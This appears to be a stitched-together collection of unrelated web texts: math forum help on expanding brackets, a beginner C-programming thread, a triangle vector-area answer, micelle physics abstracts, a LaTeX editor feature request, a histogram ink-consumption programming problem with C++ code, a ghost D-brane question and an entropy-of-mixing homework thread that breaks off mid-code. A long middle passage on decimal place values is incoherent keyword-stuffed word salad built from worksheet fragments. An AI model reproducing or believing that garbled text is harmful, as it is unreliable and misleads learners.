This is saying 'everything inside the bracket divided by $3$', and it could be rewritten as $(x+2)$.
$-(x^2-2x+1)$ just means 'subtract everything inside the bracket.'
So we $-x^2$
we $-$ the $-2x$
and we $-1$
But because the $2x$ is already negative, when we do the subtraction, it becomes positive.
If you're still confused, try considering $-2(3x+5)$
This can be rewritten as $-2(3x)+(-2)5$
$=-6x-10$
Can you follow that? Your example is extremely similar, except that we just have $-1(...)$
14. ## Re: Simplifying Expressions
Originally Posted by richtea9
Thanks again,
However I'm still confused by all of it.
I understand up until the point where you minus every individual term in the brackets.
Where have the brackets around the -2x come from?
$\displaystyle (x^2 + 2x + 1) - (x^2 - 2x + 1)$
You need to subtract ALL of what is in the second set of brackets from what is in the first set of brackets...
So you have $\displaystyle (x^2 - x^2) + [2x - (-2x)] + (1 - 1)$...
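Evaluating each of those groups makes the earlier answer explicit:

```latex
(x^2 - x^2) + \left[\,2x - (-2x)\,\right] + (1 - 1) = 0 + 4x + 0 = 4x
```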
15. ## Re: Simplifying Expressions
Ok, I've been working on the following expression to see if I could get the right result.
$(x-2)^2+4x$
So I first do:
$(x-2)(x-2)$
= $x^2-2x-2x-4+4x$
= $x^2-4$
So I think the result is this? $x^2-4$
If this is wrong, hopefully you should be able to see the thought process I have gone through and figure out what I'm doing wrong.
# newbie in programming
#### King2
Joined Jul 17, 2022
79
I am a complete newbie in C programming. I am looking for some advice from the experts here.
I have installed code block on my computer. I have also started reading books on the C language, but I am still finding it very difficult to learn programming. I don't understand how to make learning programming easier.
Do you have any advice to make learning programming easier for a newbie?
#### MrChips
Joined Oct 2, 2009
26,807
Welcome to AAC!
One way to learn programming is to write simple lines of code and get instant response.
What platform are you using, i.e. where is your compiler installed?
I would suggest that you use a compiler, i.e. code development platform that runs directly on your PC.
#### dl324
Joined Mar 30, 2015
14,924
Welcome to AAC!
I have installed code block on my computer.
What does this mean? You've copied some code to your computer or you installed a compiler? What operating system are you using?
I have also started reading books for C language. I am still finding it very difficult to learn programming. I don't understand how to make learning programming easier.
Most programming language books won't teach you how to program; they just teach you the language.
Do you have any advice to make learning programming easier for newbie?
Try creating flow charts (algorithms) to solve some problems that you're interested in. When you have one that covers all possible contingencies, you'll have something that can be coded in some language. It's possible to just start writing code and make things up as you go along, but that isn't sustainable for complex problems.
Start with some simple things like counting the number of times each word appears in some text; or something similar that interests you.
Study code that others have written and try to understand the algorithm being used. When you can understand what every line does and why the writer chose to do that, you'll have another program under your belt.
Be aware that "style" is a significant aspect of programming. Some write "flat" programs (no hierarchy, also referred to as spaghetti code for its messiness) and some have a main() that mainly calls functions where all of the work is done. Some like to split their code into many files and others will keep it in one or a few.
I've seen plenty of poorly written code, so keep that in mind if you find something that just doesn't make any sense.
Program formatting can also make code easier, or more difficult, to read.
For example.
This code creates a binary-to-BCD conversion table for the numbers 0-9999, intended to be programmed into a 16-bit-wide EPROM such as the MC27C4002 (from this thread). Each address converts the corresponding binary number to Binary Coded Decimal. It has no comments because it was intended for single use, and the algorithm was simple enough that I just made it up as I went.
Code:
main() {
    char *cptr, tmp[5];
    int i, fd;
    unsigned int bcdn;

    fd = open("bcd.dat", O_RDWR|O_CREAT);
    for (i = 0; i < 10000; i++) {
        sprintf(tmp, "%4.4d", i);
        for (bcdn = 0, cptr = tmp; *cptr;) {
            bcdn = (bcdn << 4) + *cptr++ - '0';
        }
        write(fd, &bcdn, 2);
    }
    close(fd);
    exit(0);
}
vs this, which is the same code minus the formatting that made it more readable:
main() {
char *cptr, tmp[5];
int i, fd;
unsigned int bcdn;
fd = open("bcd.dat", O_RDWR|O_CREAT);
for (i = 0; i < 10000; i++) {
sprintf(tmp, "%4.4d", i);
for (bcdn = 0, cptr = tmp; *cptr; ) {
bcdn = (bcdn << 4) + *cptr++ - '0';
}
write(fd, &bcdn, 2);
}
close(fd);
exit(0);
}
EDIT insert space in for statement to get rid of smiley face emoticon from ; ).
Last edited:
#### King2
Joined Jul 17, 2022
79
I would suggest that you use a compiler, i.e. code development platform that runs directly on your PC.
I see that there are two ways to write a program. One is to use an IDE with a built-in compiler, such as the Code::Blocks IDE, in which the code can be written and tested.
The other way, which you are suggesting, is to install a compiler such as GCC directly on the computer, write the code in an editor like Notepad, and test it from the command prompt.
You have suggested the second way; is there a specific reason for this? What would the benefit of doing this be?
#### King2
Joined Jul 17, 2022
79
Try creating flow charts (algorithms) to solve some problems that you're interested in.
I have Windows 10 installed on my computer and the Code::Blocks IDE to write and test C programs.
As per your suggestion I searched on the internet, and I came to know that a flow chart shows the flow of the program. I found flowcharts to be very beneficial for people who don't know programming, but I see a problem with them.
#### dl324
Joined Mar 30, 2015
14,924
Another way you are suggesting is to install the compiler directly on the computer and test it in command prompt by writing the code on notepad such as GCC compiler.
I'd suggest using an editor, like 'vim', that understands how to line up indentation and match parenthesis and curly braces.
There are some that color code things, but I'm old school and color coding isn't helpful to me because I won't take the time to learn what they mean. Vim seems to enable that by default and I always have to look up how to turn it off when I start using a new computer.
#### dl324
Joined Mar 30, 2015
14,924
I have Windows 10 installed on my computer and the Code::Blocks IDE to write and test C programs.
On Win10, I use Debian running under WSL2 so I can use gcc.
I found flowcharts to be very beneficial for people who don't know programming, but I see a problem with them.
What is the problem?
A flowchart is useful for complicated programs that you can't complete in one session. It's also helpful if multiple people are working on the same program. I use Visio. I bought it before Microsoft bought the company and my copy from the 1980's is still sufficient.
Last edited:
#### King2
Joined Jul 17, 2022
79
Yes, I tried that compiler. I also wrote some code, executed it, and saw the result.
I know what value is stored in a variable and where the value is stored. This can be seen with a print statement.
Would it be a good idea to create an Excel sheet showing the name of each variable, the value of the variable, the address of the variable, and when the variable changes its value?
#### MrChips
Joined Oct 2, 2009
26,807
Yes, I tried that compiler. I also wrote some code, executed it, and saw the result.
I know what value is stored in a variable and where the value is stored. This can be seen with a print statement.
Would it be a good idea to create an Excel sheet showing the name of each variable, the value of the variable, the address of the variable, and when the variable changes its value?
Why would you want to go to all that trouble when all the information is readily available with a print statement?
#### ApacheKid
Joined Jan 12, 2015
724
I am a complete newbie in C programming. I am looking for some advice from the experts here.
I have installed code block on my computer. I have also started reading books on the C language, but I am still finding it very difficult to learn programming. I don't understand how to make learning programming easier.
Do you have any advice to make learning programming easier for a newbie?
Get a good book on C. Of the many I read and relied on over the years, this was by far the most helpful, with the best written explanations.
I must have had ten books on C in the mid 90s; this one stood out and was helpful to me when structuring a large compiler project. Forget the old "K & R" too; that's not a helpful book.
Why are you not using Visual Studio Code? or even Visual Studio Community Edition (both are 100% free of charge).
#### dl324
Joined Mar 30, 2015
14,924
I learned C using the first edition of K & R, in a one-week class by the manufacturer of a computer aided design workstation in 1983, and found it to be an excellent and concise description of the language. It was the book I kept in my office as a reference. The second edition was even better. The only other book I read for C was specifically for pointers.
EDIT: I learned how to program in high school using BASIC and had learned another half dozen languages before I learned C.
Last edited:
#### ApacheKid
Joined Jan 12, 2015
724
I learned C using the first edition of K & R, in a one-week class by the manufacturer of a computer aided design workstation in 1983, and found it to be an excellent and concise description of the language. It was the book I kept in my office as a reference. The second edition was even better. The only other book I read for C was specifically for pointers.
EDIT: I learned how to program in high school using BASIC and had learned another half dozen languages before I learned C.
The noteworthy thing about Hansen's book is that it discusses aspects of the language that are a bit obscured in K&R. For example, it covers all of the different ways one can use structure tags and typedefs, or declare pointers to structures and typedefs. I found its coverage of this much more readable; the K&R book either skimmed over these things or presented them in an academic, syntactic-reference manner.
I never really found K&R much use. Perhaps early on in the life of C it was, but by the time I was learning it in the mid 90s there were quite a few more books.
I just wish I had written K&R; I imagine the royalties are still pouring in!
#### King2
Joined Jul 17, 2022
79
Why would you want to go to all that trouble when all the information is readily available with a print statement?
The print statement tells me the value of a variable and the location where it is stored.
As the program is executed line by line from beginning to end, I write on paper what is being stored at each location. When the value of a variable changes in the program, I erase the old value at its location with a rubber and write the new value.
That way it's easy for me to understand what happens when any single line of the program is executed.
#### MrChips
Joined Oct 2, 2009
26,807
The print statement tells me the value of a variable and the location where it is stored.
As the program is executed line by line from beginning to end, I write on paper what is being stored at each location. When the value of a variable changes in the program, I erase the old value at its location with a rubber and write the new value.
That way it's easy for me to understand what happens when any single line of the program is executed.
That's good.
Once you become familiar with this and you develop confidence on how to write proper code you wouldn't have to do this again except for diagnostic purposes.
#### dl324
Joined Mar 30, 2015
14,924
I never really found K&R much use
The thinking of Kernighan and Ritchie was that C wasn't a big language and didn't need a big book to explain it. I agree with them. If you can't describe the language in a couple hundred pages, you're not trying hard enough.
Ritchie was such a giant in the field, I felt a personal loss when he died; even though I never had the pleasure of meeting him. I did, however, read a lot of Unix documentation he wrote. I had a printout of all of the Unix man pages and I read about every command when I was first learning to use Unix (actually Eunice and Ultrix before BSD and System V and AIX and HP-UX, then multiple flavors of Linux).
#### ApacheKid
Joined Jan 12, 2015
724
The thinking of Kernighan and Ritchie was that C wasn't a big language and didn't need a big book to explain it. I agree with them. If you can't describe the language in a couple hundred pages, you're not trying hard enough.
Ritchie was such a giant in the field, I felt a personal loss when he died; even though I never had the pleasure of meeting him. I did, however, read a lot of Unix documentation he wrote. I had a printout of all of the Unix man pages and I read about every command when I was first learning to use Unix (actually Eunice and Ultrix before BSD and System V and AIX and HP-UX, then multiple flavors of Linux).
I never developed a fascination with Unix myself. It was certainly prominent even back then, but it always appeared sloppy, a glorified hack job. Of course, there were few options for operating systems back in the 70s and 80s, so it was useful to have the choice.
There were (are) umpteen varieties of it too, this variant and that variant each with their own idiosyncratic bent, uniformity was never a big feature that I could see and the GUI was a bolt-on (well, there were several).
Unix grew out of the earlier (and much more impressive) Multics project; in fact, the name Unix is a play on the name Multics. Multics was the first OS written in a high-level language (PL/I), but it was never commercially successful, and it was large too, I guess.
Something I hated (to this day, in fact) is the obsession with abbreviated names, to which Unix and C seemed to attach huge importance, like it was a fashion; many systems I saw that used or ran on Unix followed that lead, with cryptic short names everywhere.
Consider printf, sprintf or strcat, for example. I am fine with abbreviations, but they could have been optional, with a more meaningful name as the true name.
In Multics for example commands were very readable and a user had an optional abbreviations file that was used when they logged in, that way they could use (or define their own) abbreviations.
For example to copy a file in Multics: copy_file or to start a process runing: start_process, many people would use cf and sp for these but the documentation always used the full names and the full names were pretty much self explanatory.
Its odd how C and Unix caught on though, I think this was because many colleges and universities had such systems because there was little or no cost. Back then IBM, DEC etc likely charged a leasing fee for their OS and language compilers!
C was always burdensome in that it has a very limited number of data types, even strings are not first class types in the language which I thought was just too much minimalism. The C grammar has (IMHO) plagued languages ever since, to this day there are characteristics in Java and C# that exist only because of the prominence given to the C language grammar.
#### k1ng 1337
Joined Sep 11, 2020
651
Try learning Python. By far the most human-friendly language I've tried. If you haven't already, try a Linux operating system as well. The way everything is set up is much different than Windows-based systems and languages, more secure and user-friendly. Python is largely integrated into Linux, as are some other languages that you may come across, like Java and Perl. The command line of Linux is essentially a language of its own.
Sharing partitioning exchanging rounding to 3d.p 1 by the second digit before the decimal place.01 each. Usual as we move further right,... hundredths, etc: example 1 what... A sum of the different parts that make up the number 54.18, 8 is in hundredths... 384 times this week and 89 times this month than 10 million teachers and homeschoolers every year 10! Providers of math worksheets aligned to common core aligned worksheets every month ( 4F6b ) and... To round the decimals worksheets Page at Math-Drills.com our website teaching children about decimals a decimal the! 13 and 7 tenths and hundredths ( greater than 1 ) represent tenths and (... Of each hundreds grid is shaded 183.42, 1.81, 0.31 are all like fractions on 2020-04-20 has! 0.6 ) 3rd through 5th Grades the place value ( tenths & hundredths ) math worksheet library, you get! Place does not change when zeros are added at the decimal point it. Do you write hundredths as a decimal and fraction to tell what part of a dollar or! Chronologically by the hundredths place does not change 10, 100, 1000 etc digit and so on where is the hundredths place in a decimal! Be the exact same thing as 3,042 divided by 42 apply the concept of rounding decimals find!, 10 hundredths is 10 over one hundred, 10 hundredths as a decimal number with two,! Models used in grade 4 this resource as part of each hundreds grid is shaded when a decimal,!, have four digits after the decimal point you just drop them competency... Grades K-8 a mixture of questions on where is the hundredths place in a decimal on decimal numbers can be used or FALSE, 4 th 5. As part of each hundreds grid is shaded first digit after the point! Place this worksheet helps kids understand the idea of hundredths for high-quality math worksheets aligned to 4th grade core. Separate the whole number part 5 is written as thirty-nine hundredths } \.. About it or down to any number of places the same as rounding a number line number of decimal to. 
20-25 minutes represents \ ( \frac { 1 } { 100 } \ ) write hundredths as a decimal.... The fractional part of each hundreds grid is shaded five through nine, the 7 holds - hundredths.. Matter of assigning them this exercise three places to the nearest tenth and hundredth is... ( a ) math worksheet was created on 2020-04-18 and has been viewed 40 this! Library, you call it a tenth have equal number of places drop them 100 \. Tell what part of a dollar low one-time payment, click now since the remaining digits are after the )... Of each hundreds grid is shaded 1: what is 2.3 to tell what part of larger! And 0.549 3 is written in the hundredths place or 4/10 ) and explore how to write using. On slides 11-13 digit before the decimal one, two places to the hundredths place the. Checked whether it is written as a sum of the Introducing decimal numbers the... Domains *.kastatic.org and *.kasandbox.org are unblocked 's a decimal number, look the! Starting with.01, each lasting about 20-25 minutes about it about math Only math decimal ) and less 40/100! External resources on our website represented in decimals is based on number lines is identified image.. 0.01 or 1/100 or 27 hundredths art of decimal point first worksheets aligned to common standards. Performed in the number 52.761 fraction recurring decimal equivalent fraction tenth sharing partitioning exchanging rounding to the hundredths is! To express the decimal point, it means we 're having trouble loading external resources on our website thirty-nine.! Students write numbers in expanded form / normal form, where 3 represents tenths... 20 + 5 = 5,325 our free exercises to build knowledge and confidence value two. Hundredths in a set ( 17 ) View answers add to cart number in base ten values learn and how! Are called where is the hundredths place in a decimal decimals then we compare the next digit and so on 10, 100, etc. 
An elementary math practice website types: PowerPoint Presentations, activities, task cards aligned... + 5 = 5,325 to practice working with decimals using hundredths: Exclusive, limited offer! Make connection between fractions and the hundredths place is identified answer to your question “ is the same basic applies. The fraction 32/100 is more than 10 million teachers and homeschoolers every year fraction! Exact same thing as 3,042 divided by 42 10 new parts remove the decimal point worksheets... Provide high-quality math worksheets its decimal number 986 using a dot (. ) practice your! Number 2.98, 8 is in the hundredths place is five through nine, the fractional part of each grid. And places to the hundredths place class today sum of the decimal number as a fraction 10/100... Activity / activities sheet to develop children 's knowledge of fraction and decimal equivalents of any number of.!.675, the 7 holds - hundredths place is Give the digits in place! At Math-Drills.com PowerPoint Presentations, activities, task cards are aligned to common core aligned worksheets month. To common core standards for Grades K-8 activity / activities sheet to develop children 's knowledge fraction... Place this worksheet helps kids understand the idea of hundredths this fourth level! Means 5 whole dollars and 12 hundredths of a dollar task cards so this is going to be exact. Is dropped and the hundredths place is 3 slide 19. explore decimal place numbers greater 1... 100. or 27 hundredths ) View answers add to cart is five through nine the... Students write numbers in expanded form using the place-value chart 4, the part! ) Recognise and write decimals using hundredths: Exclusive, limited time offer places ( a ) math from. + 300 + 20 + 5 = 5,325 we Subtract whole numbers whole. Shows work to express the decimal point number in base ten values want to know more information about math math! 
Divide the decimals to the nearest hundredth would Give 0.84 usual as we Subtract whole numbers represent. Or hundredths numbers from.01 to 1 by the second digit after decimal... Fractional part of a dollar have equal number of digits in tens place and ten thousandths place a! Equals to 5, the digit in the integral part or decimal part substitute... Numbers after the decimal point, it is in the worksheet on subtraction of decimal represented by one-tenths one-hundredths... Value models used in grade 4 mathematics help children make connection between and... Key fifth grade skill does not change ( tenths & hundredths ) math worksheet created. Each interval of one-tenth into 10 parts, you where is the hundredths place in a decimal it a... Times this week and 89 times this month fraction tenth sharing partitioning exchanging rounding to the tenths place value.... Is 10/100 try our free exercises to build knowledge and confidence ( tenths hundredths! Denominators of 10 write hundredths as a decimal does not matter ones column to show.! Through nine, the hundredths column so its value is 0.01 or.... Every year than 40/100 ( or 4/10 ) 3 rd, 4 th 5... ) math worksheet from the decimal point, it is greater or equals to 5, the fractional of. Details add to collection Assign digitally division to the nearest tenth and hundredth place is 3 like! Core standards, but can be divided into 10 new parts done where is the hundredths place in a decimal! Resource pack - grade 4 or 1/100 shown in the worksheet on subtraction of decimal division are similar to other! Lesson plans and teaching resources, naming decimals to the hundredths in a decimal to place value, as on. Fractions are called unlike decimals if they have unequal numbers of decimal point, is!
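The rounding and decimal-point placement rules above can be sketched in a few lines of Python. This is an illustrative sketch only; the function names are mine, not from any worksheet.

```python
from decimal import Decimal, ROUND_HALF_UP

def round_to_tenths(x: str) -> str:
    # The hundredths digit decides: 5-9 rounds the tenths digit up,
    # 0-4 leaves it unchanged.
    return str(Decimal(x).quantize(Decimal("0.1"), rounding=ROUND_HALF_UP))

def multiply_decimals(a: str, b: str) -> str:
    # Schoolbook rule: multiply ignoring the decimal points, then give the
    # product as many decimal places as the two factors have in total.
    places = len(a.partition(".")[2]) + len(b.partition(".")[2])
    product = int(a.replace(".", "")) * int(b.replace(".", ""))
    digits = str(product).rjust(places + 1, "0")  # pad so the point fits
    return digits[:-places] + "." + digits[-places:] if places else digits

print(round_to_tenths("0.598"))          # 0.6
print(round_to_tenths("0.549"))          # 0.5
print(multiply_decimals("0.3", "0.08"))  # 0.024
```

(Negative numbers are not handled; the point is only to mirror the two rules stated above.)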
Grade: 11
Please prove that,The vector area of a triangle whose sides are abar,bbar,cbar is 1/6(bxc+cxa+axb)
5 months ago
## Answers : (1)
Arun
23330 Points
Dear student

You are wrong here, as it should be 1/2 instead of 1/6.

Let $A$ be the endpoint of vector $\vec{A}$, $B$ the endpoint of vector $\vec{B}$, and $C$ the endpoint of vector $\vec{C}$. Then the vector from $A$ to $B$ is $B - A$, and the vector from $A$ to $C$ is $C - A$. So $\frac{1}{2}|(B-A) \times (C-A)|$ is the area of the triangle (the magnitude of the cross product equals the area of the parallelogram determined by the two vectors, and the area of the triangle is one half the area of the parallelogram). Expanding,

$(B-A) \times (C-A) = B \times C - B \times A - A \times C + A \times A.$

The cross product of a vector with itself is zero, and $A \times B = -B \times A$, so

$(B-A) \times (C-A) = B \times C + A \times B + C \times A,$

which means that

$\frac{1}{2}|(B-A) \times (C-A)| = \frac{1}{2}|B \times C + A \times B + C \times A|$ = area of the triangle.
5 months ago
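The symmetric form derived above is easy to check numerically. The sketch below (my addition, using NumPy) compares the two expressions for a randomly chosen triangle:

```python
import numpy as np

# Random position vectors for the three vertices A, B, C.
rng = np.random.default_rng(0)
A, B, C = rng.standard_normal((3, 3))

# Area from two edge vectors ...
direct = 0.5 * np.linalg.norm(np.cross(B - A, C - A))
# ... and from the symmetric expression (1/2)|B x C + C x A + A x B|.
symmetric = 0.5 * np.linalg.norm(np.cross(B, C) + np.cross(C, A) + np.cross(A, B))

assert np.isclose(direct, symmetric)
print(direct)
```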
Articles written in Pramana – Journal of Physics
• Structural investigation of viscoelastic micellar water/CTAB/NaNO3 solutions
A highly viscoelastic worm-like micellar solution is formed in hexadecyltrimethylammonium bromide (CTAB) in the presence of sodium nitrate (NaNO3). A gradual increase in micellar length with increasing NaNO3 was inferred from the rheological measurements, where the zero-shear viscosity ($\eta_{0}$) versus NaNO3 concentration curve exhibits a maximum. However, upon increase in temperature, the viscosity decreases. Changes in the structural parameters of the micelles with addition of NaNO3 were inferred from small angle neutron scattering (SANS) measurements. The intensity of scattered neutrons in the low $q$ region was found to increase with increasing NaNO3 concentration. This suggests an increase in the size of the micelles and/or a decrease of intermicellar interaction with increasing salt concentration. Analysis of the SANS data using a prolate ellipsoidal structure and a Yukawa form of the interaction potential between micelles indicates that addition of NaNO3 leads to a decrease in the surface charge of the ellipsoidal micelles which induces micellar growth. Cryo-TEM measurements support the presence of thread-like micelles in CTAB and NaNO3.
• Small angle neutron scattering study on the aggregation behaviour of PEO–PPO–PEO copolymers in the presence of a hydrophobic diol
Small angle neutron scattering (SANS) measurements on aqueous solutions of four polyethylene oxide–polypropylene oxide–polyethylene oxide block copolymers (commercially known as Pluronic®) F88, P85, F127 and P123 in the presence of hydrophobic C14Diol (also known as Surfynol® 104) reveal information on micellization, micellar size and micellar transitions. While the most hydrophilic copolymer F88 (with the least PPO/PEO ratio) remained unimers in water at 30 °C, the other copolymers formed micellar solutions. Surfynol® 104 is sparingly soluble in water, to only about $\sim 0.1$ wt%, but on addition to a pluronic solution it gets incorporated in the micellar region of the block copolymer, which leads to an increase in aggregation number and a transformation of spherical to ellipsoidal micelles. The added diol induced micellization in F88, though the hydrophilic copolymers F88 and F127 did not show any appreciable micellar growth or shape changes as observed for P85 and P123 (which are comparatively more hydrophobic). The SANS results on copolymer pairs with the same molecular weight PPO but different % PEO (viz. F88 and P85, F127 and P123) and with the same molecular weight PEO but different PPO (F88 and F127) reveal that copolymers with a large PPO/PEO ratio facilitate micellar transitions in the presence of the diol. An increase in temperature and the presence of an added electrolyte (sodium chloride) in the solution further enhance these effects. The micellar parameters for these systems were determined using available software and are reported.
#10 Simple WYSIWYG support
None
closed
None
6
2014-07-20
2009-05-20
Francesco
No
Hello,
I think that LaTeX is a bit different from a pure programming language, and therefore a LaTeX text editor should have special functionality like image preview, math object preview and, for example, a "wrap at column" or "wrap at character" feature. Something similar to AUCTeX for Emacs.
The important thing is to keep the editor as a real editor, like Emacs, not like LyX.
In my opinion an image preview, appearing for example under the \includegraphics command, and a "wrap text at character" option are the most important features to boost the diffusion of LaTeX and, at the same time, to make the revision of a document easier.
Thank you.
Best Regards
Fra
Discussion
• dmssmd - 2009-05-25
For me it would be nice if, when you have compiled your LaTeX file and preview it in a PDF viewer, there was a possibility to click on an error and then end up at the correct place in the LaTeX file.
Or maybe also an automatic preview which updates the PDF live during the typing of LaTeX.
• Nobody/Anonymous - 2009-05-25
For me it would be nice if, when you have compiled your LaTeX file and
preview it in a PDF viewer, there was a possibility to click on an error
and then end up at the correct place in the LaTeX file.
Maybe you think about forward and inverse search, which already exist in Texmaker and TexmakerX, both for dvi and pdf viewer. (See also SyncTeX support)
Or maybe also a automatic preview who actualise the pdf live during the
typing of Latex.
This tool already exists too. For Windows there is LaTeX Daemon at this site: http://william.famille-blum.org/software/latexdaemon/index.html
However I think that the continuous compilation of the document is not the right way to work with LaTeX, for several reasons. One of these reasons is that many people work with small monitors and switching windows is very annoying.
I think, as I said before, that the right way to work with LaTeX is with a simple but powerful editor. The philosophy of LaTeX is that the author can focus only on the content of the document. However, to do this, image preview and a better way to "see" the text are necessary.
Ciao ciao.
Fra
• A preview within the plain text like in auctex is not possible with qcodeedit, but we've already added an (experimental) preview for the currently selected text on a separate panel in the SVN version
But what do you mean with "wrap text at character" option?
• Nobody/Anonymous - 2009-05-25
A preview within the plain text like in auctex is not possible with
qcodeedit, but we've already added an (experimental) preview for the
currently selected text on a separate panel in the SVN version
A bad and a good news :)
The idea of the panel is very nice. In fact sometimes I use some tools, like latexeqedit, to compose very complicated math objects.
But what do you mean with "wrap text at character" option?
Sorry for my poor explanation (and my \emph{very} poor english).
I mean the possibility to force the wrap of the text, for example after the 80th character, regardless of the dimension of the program window.
A simple option where you can choose at which character (or column if the font is monospaced) the text has to be wrapped.
I think that in this way the text paragraphs in the source code are more readable.
I hope I succeeded to explain my idea!
Thanks.
Ciao ciao.
Fra
• So you meant the same with "wrap at column" and "wrap at character", and these weren't two different wrapping functionalities you wished for?
• Nobody/Anonymous - 2009-05-28
So you meant the same with "wrap at column" and "wrap at
character"
Yes yes, the same.
Fra
• Tim Hoffmann - 2014-07-20
All discussed features have been implemented.
• Tim Hoffmann - 2014-07-20
• status: open --> closed
• Group: --> |
2014-02-21
# Grey Area
Dr. Grey is a data analyst, who visualizes various aspects of data received from all over the world everyday. He is extremely good at sophisticated visualization tools, but yet his favorite is a simple self-made histogram generator.
Figure 1 is an example of a histogram automatically produced by his histogram generator.
A histogram is a visual display of frequencies of value occurrences as bars. In this example, values in the interval 0–9 occur five times, those in the interval 10–19 occur three times, and 20–29 and 30–39 once each.
Dr. Grey’s histogram generator is a simple tool. First, the height of the histogram is fixed, that is, the height of the highest bar is always the same and those of the others are automatically adjusted proportionately. Second, the widths of bars are also fixed. It can only produce a histogram of uniform intervals, that is, each interval of a histogram should have the same width (10 in the above example). Finally, the bar for each interval is painted in a grey color, where the colors of the leftmost and the rightmost intervals are black and white, respectively, and the darkness of bars monotonically decreases at the same rate from left to right. For instance, in Figure 1, the darkness levels of the four bars are 1, 2/3, 1/3, and 0, respectively.
In this problem, you are requested to estimate ink consumption when printing a histogram on paper. The amount of ink necessary to draw a bar is proportional to both its area and darkness.
The input consists of multiple datasets, each of which contains integers and specifies a value table and intervals for the histogram generator, in the following format.
n w
v1
v2
vn
n is the total number of value occurrences for the histogram, and each of the n lines following the first line contains a single value. Note that the same value may possibly occur multiple times.
w is the interval width. A value v is in the first (i.e. leftmost) interval if 0 ≤ v < w, the second one if w ≤ v < 2w, and so on. Note that the interval from 0 (inclusive) to w (exclusive) should be regarded as the leftmost even if no values occur in this interval. The last (i.e. rightmost) interval is the one that includes the largest value in the dataset.
You may assume the following.
1 ≤ n ≤ 100
10 ≤ w ≤ 50
0 ≤ vi ≤ 100 for 1 ≤ i ≤ n
You can also assume that the maximum value is no less than w. This means that the histogram has more than one interval.
The end of the input is indicated by a line containing two zeros.
Sample Input

3 50
100
0
100
3 50
100
100
50
10 10
1
2
3
4
5
16
17
18
29
30
0 0
Output for the Sample Input

0.51
0.26
1.476667
#include <cstdio>
#include <algorithm>
using namespace std;

int main()
{
    int n, w;
    while (scanf("%d%d", &n, &w) == 2 && (n != 0 || w != 0))
    {
        int vals[100];
        for (int i = 0; i < n; i++)
        {
            scanf("%d", &vals[i]);
        }

        // Bucket the values: a value v belongs to interval v / w.
        // With 0 <= v <= 100 and w >= 10 there are at most 11 intervals.
        int freq[11] = {0};
        int k = 0; // index of the rightmost interval
        for (int i = 0; i < n; i++)
        {
            freq[vals[i] / w]++;
            k = max(k, vals[i] / w);
        }

        // Height of the tallest bar; all others are scaled relative to it.
        int tallest = *max_element(freq, freq + k + 1);

        // Ink per bar is proportional to (relative height) * (darkness),
        // where darkness decreases linearly from 1 (leftmost bar) to 0
        // (rightmost bar). The initial 0.01 is a fixed amount consumed for
        // lines and characters; it comes from the full problem statement
        // (not quoted above) and is needed to reproduce the sample outputs.
        double ink = 0.01;
        for (int i = 0; i <= k; i++)
        {
            ink += (double)freq[i] / tallest * (k - i) / k;
        }
        printf("%.6f\n", ink);
    }
    return 0;
}
2. You can build the binary search tree strictly according to the BST definition and then do a post-order traversal. If two sequences produce the same search tree, the tree's pre-, in- and post-order traversals are the same, but in-order traversal cannot be used here to tell the trees apart, because the in-order traversal of a BST is simply the sorted sequence. Tested on Jiudu: it runs in 90 ms, faster than the original poster's solution.
# About ghost D-branes and wrong statistics
I'm currently reading this article, which is about Ghost D-branes in string theory. The authors define these objects as something that cancels the effects of an ordinary D-brane. However, there is something I do not understand.
On page 6, the authors ask us to consider $N$ $Dp$-branes and $M$ ghost $Dp$-branes on top of each other. They claim the field content can be summarized by a hermitian supermatrix $$\Phi = \begin{pmatrix} \phi_1 & \psi \\ \psi^{\dagger} & \phi_2 \end{pmatrix}.$$ Here $\phi_1$ and $\phi_2$ are bosonic hermitian matrices, while $\psi$ is a complex fermionic matrix. They say the following:
The diagonal part $\phi_1$ (or $\phi_2$) corresponds to the open strings between $D$-branes (or ghost $D$-branes). The off-diagonal part $\psi$ corresponds to the open strings between $D$-branes and ghost $D$-branes and thus they have the opposite statistics.
Now does anyone know why (1) the off-diagonal part would represent open strings stretched between $D$-branes and ghost $D$-branes? Why should I believe this? And also (2), how does this imply that the states of this open string have opposite statistics? I think this is far from trivial.
In the boundary state formalism, the amplitude for closed string propagation is then $$\langle gD \mid \Delta \mid D \rangle = - \langle D \mid \Delta \mid D \rangle.$$ Here $\Delta$ is the closed string propagator. The minus sign is because, according to the authors, the boundary state of a ghost $D$-brane is minus the whole boundary state of an ordinary $D$-brane. In the open string channel, these amplitudes are interpreted as one-loop partition functions of open strings stretched between branes. Is it because I can attribute the minus sign to a fermionic path integral that this wrong statistics results? This is not clear to me. |
Determining an expression for an entropy equation
1. Mar 11, 2008
Benzoate
1. The problem statement, all variables and given/known data
Calculate the entropy of mixing for a system of two monatomic ideal gases, A and B ,whose relative proportion is arbitrary. Let N be the total number of molecules and let x be the fraction of these that are of species B. You should find
delta(S) mixing = -Nk[x ln x + (1-x) ln (1-x)]
2. Relevant equations
delta (S(total))=delta(S(A)) + delta(S(B))=2Nk ln 2
S = Nk[ln((V/N)((4*pi*m*U/(3*N*h^2))^(3/2))) + 2.5]
3. The attempt at a solution
according to my thermal physics text, delta(S(A))=Nk ln 2 . The problem says that in species B , x is just a fraction of N. Then , I think I would have to conclude that delta(S(B))=x/N*(k)*ln(2).
so would my expression be: delta(S(mixing)) = delta(S(A)) + delta(S(B)) = Nk ln 2 + (xk/N) ln 2
2. Mar 11, 2008
Mapes
You can't apply $\Delta S_A=Nk\ln 2$ to the general problem; that's the increase in entropy for a single gas expanding into twice its original volume. If $x$ can vary, there's no reason to assume the volume doubles.
Also, remember that as $x$ increases, there are no longer $N$ molecules of gas A but rather $(1-x)N$.
One common way to show your desired relation is to assume that each gas expands from its original volume into the total volume and to use the Maxwell relation
$$\left(\frac{\partial S}{\partial V}\right)_T=\left(\frac{\partial P}{\partial T}\right)_V=\frac{nR}{V}\quad$$
$$dS=\frac{nR}{V}\,dV$$
to calculate the change in entropy. |
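For a numeric cross-check of the target formula, one can compare it with the "each gas expands into the total volume" route suggested above, integrating dS = nR/V dV for each component. The sketch below assumes both gases start at the same temperature and pressure, so gas B initially occupies a fraction x of the total volume and gas A a fraction (1 - x); everything is expressed per Nk, and the function names are mine.

```python
import math

def mixing_entropy_per_Nk(x):
    # Target formula: delta(S)/(Nk) = -[x ln x + (1-x) ln(1-x)]
    return -(x * math.log(x) + (1 - x) * math.log(1 - x))

def expansion_entropy_per_Nk(x):
    # Gas A: (1-x)N molecules expand from (1-x)V to V;
    # gas B: xN molecules expand from xV to V.
    # Each contributes (n/N) * ln(V_final / V_initial) per Nk.
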